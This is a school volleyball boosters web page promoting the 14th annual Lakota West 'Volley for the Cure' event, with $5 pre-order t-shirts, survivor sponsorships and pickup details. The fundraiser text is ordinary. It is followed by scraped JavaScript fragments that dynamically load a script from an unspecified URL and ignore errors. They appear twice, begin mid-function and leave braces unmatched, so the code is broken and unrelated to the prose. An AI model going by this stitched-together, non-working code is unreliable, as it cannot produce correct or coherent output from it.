Boosters
Purchase your Volley for the Cure t-shirt today!
This will be the 14th annual Lakota West Volley for the Cure event. The event is on Tuesday 9/8 and is attached to a GMC Volleyball match up of Lakota West and Princeton high school. In the past, it has been a gala event.
This year things are a bit calmer as we will not be able to entertain the usual masses. But you can still be
involved by getting your own Volley for the Cure T-shirt and even sponsor one of the Honored Survivors!!
T shirts are $5 and will need to be pre-ordered and paid through the link below.
Delivery will be scheduled on Sept 2nd. It will either be Drive by pick up or front office pick up.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();